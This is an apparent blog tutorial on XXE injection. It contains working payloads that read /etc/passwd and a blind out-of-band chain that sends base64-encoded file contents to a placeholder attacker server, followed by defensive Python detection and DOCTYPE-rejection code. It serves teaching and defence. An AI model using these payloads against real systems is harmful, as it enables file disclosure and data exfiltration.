Hi All,
In this post we will cover the following topics:
What is XXE?
How to confirm XXE?
How to exploit basic XXE?
How blind XXE works?
And an alternative to the blind XXE payload.
But first let's understand some basic keywords.
Entity: Entities reference data that acts as an abbreviation or that can be found at an external location. Syntax:- &test;
Internal Entity: If an entity is declared within a DTD it is called an internal entity.
Syntax:- <!ENTITY entity_name "entity_value">
External Entity: If the entity's value is fetched from an external location, it is called an external entity; the SYSTEM keyword marks it as external.
Syntax:- <!ENTITY entity_name SYSTEM "entity_value">
Parameter Entity: The purpose of a parameter entity is to enable you to create reusable sections of replacement text inside the DTD. (If this is not clear yet, you will understand it more clearly later.)
Syntax:- <!ENTITY % entity "another entity (Internal or External)">
XXE is short for XML External Entity, a vulnerability found when a misconfigured XML parser processes external entities.
There are two types of XXE:-
1. Basic.
2. Blind.
Basic one:-
For example, you have a URL with a parameter that parses XML data, something like this:- 'http://myapp.com/somefile.php?xml='
Now, when you provide some XML data and that data is printed back to the user's browser, you can try basic XXE. First you have to confirm that the vulnerability exists, and this can be done with something like this.
Payload 1
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM 'http://yourserverip/'>]>
<root>&test;</root>
Now let's understand this.
1. First we declare the XML syntax; then we define DOCTYPE to define the contents of the XML body.
2. After that, we define the root element in the DOCTYPE (i.e. root); next, we define the entity, and that entity contains the SYSTEM keyword, which indicates that the entity is external.
3. After that we give our server's IP as the entity's location, because we want the target server to send a request to us.
4. Finally, inside the root element we reference the entity with &test;, so the parser processes our external entity by sending a request to our server IP.
Our main target is to read local files of the web server and this can be done using this payload
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>
The XML parser will process this payload the same way as above, but instead of requesting our server it will now request locally, using the file:// protocol: it fetches the file contents and shows them to us in the response. Hence, we can read local files of the web server.
Okay,
Sometimes you can still confirm the existence of the vulnerability with the first payload above (the request reaches your server), but you can't see the file contents of the web server's local files in the response. This is still an issue, but now the severity is a ***little bit lower.*** This is called Blind XXE, or Out-of-band XXE.
So we also need a blind payload, which will fetch the contents of the web server's local files and send them to our server. Sounds interesting; let's see how this whole theory works, and also whether we have some alternatives to do that.
Payload 2
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % test SYSTEM 'http://yourserverip/xml.dtd'> %test; %exe;]>
<root>&entity;</root>
Your xml.dtd contents:-
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % exe "<!ENTITY entity SYSTEM 'http://yourserver/%file;'>">
Lots of code to understand:-
Let's see how all this works.
1. The parser reads Payload 2 and hits %test;, so it fetches xml.dtd from our server and processes it as an external DTD subset.
2. Inside xml.dtd, %file; is declared as an external parameter entity whose value is /etc/passwd, base64-encoded by the php://filter wrapper so that newlines and special characters don't break the URL.
3. %exe; is a parameter entity whose replacement text is itself an entity declaration; when %exe; is referenced back in the DOCTYPE, that declaration is processed and the general entity "entity" is defined with our server URL plus the file contents in the path.
4. Finally, &entity; in the root element makes the parser request that URL, so the file contents arrive in the request to our server.
Make sense? Cool.
Now, has anyone wondered why we call the DTD from the attacker's server? Why does the payload below not work?
Payload 3
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % filecontents SYSTEM 'file:///etc/passwd'>
<!ENTITY test SYSTEM 'http://yourserver/%filecontents;'>]>
<root>&test;</root>
This would be easier than before, right? Yes it would, but it is not going to work.
According to the XML specification, a parameter entity reference can't be used inside a markup declaration in the internal DTD subset; it can only be used that way in the external subset (like we did in Payload 2, where the declarations live in xml.dtd). It is forbidden, hence you will get a "forbidden" error from the parser.
So that's the reason why we can't run the above payload.
Let's try another payload:-
Payload 4
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY filecontents SYSTEM 'file:///etc/passwd'>
<!ENTITY test SYSTEM 'http://yourserver/&filecontents;'>]>
<root>&test;</root>
So this payload parses without any problem, but &filecontents; inside the SYSTEM literal will act as a plain string: general entity references are only expanded in element content (i.e. inside the root tag), not inside the quoted URI, so the request carries the literal text &filecontents; and no file contents.
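As an added example (not part of the original post), here is Python a defender could use to triage XML request bodies, or a DTD seen by an egress proxy, for the patterns in the payloads above, plus a small parse wrapper that rejects any DOCTYPE, which is the standard mitigation. The sample documents are constructed from the post's payloads; yourserverip is the post's placeholder.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples modelled on the post's payloads; yourserverip is the post's placeholder.
BASIC_XXE = """<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>"""

BLIND_XXE = """<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % test SYSTEM 'http://yourserverip/xml.dtd'> %test; %exe;]>
<root>&entity;</root>"""

# Body of the external DTD the blind payload fetches (what an egress proxy would see).
EVIL_DTD = """<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % exe "<!ENTITY entity SYSTEM 'http://yourserverip/%file;'>">"""

BENIGN = """<?xml version="1.0"?>
<order><id>42</id><qty>3</qty></order>"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# External entity declarations, general (<!ENTITY x SYSTEM) or parameter (<!ENTITY % x SYSTEM).
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_REF_RE = re.compile(r"%\w+;")  # %name; references that chain the blind payload
SCHEME_RE = re.compile(r"\b(file|php|http|https|ftp|expect|jar|gopher)://", re.IGNORECASE)


def triage(body: str) -> dict:
    """Summarise the XXE indicators present in an XML request body (or a fetched DTD)."""
    return {
        "doctype": bool(DOCTYPE_RE.search(body)),
        "external_entities": len(EXT_ENTITY_RE.findall(body)),
        "parameter_refs": len(PARAM_REF_RE.findall(body)),
        "schemes": sorted({m.group(1).lower() for m in SCHEME_RE.finditer(body)}),
    }


def safe_parse(body: str) -> ET.Element:
    """Mitigation: reject any document that carries a DTD before it reaches the parser."""
    if DOCTYPE_RE.search(body):
        raise ValueError("DOCTYPE/DTD is not accepted by this endpoint")
    return ET.fromstring(body)


if __name__ == "__main__":
    for name, doc in [("basic", BASIC_XXE), ("blind", BLIND_XXE), ("dtd", EVIL_DTD), ("benign", BENIGN)]:
        print(name, triage(doc))
```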
That's all guys; I just wanted to share because I wanted to. :) Anything you want me to edit, please let me know.
Hope you like this read.
Have a good hacking day.
Thanks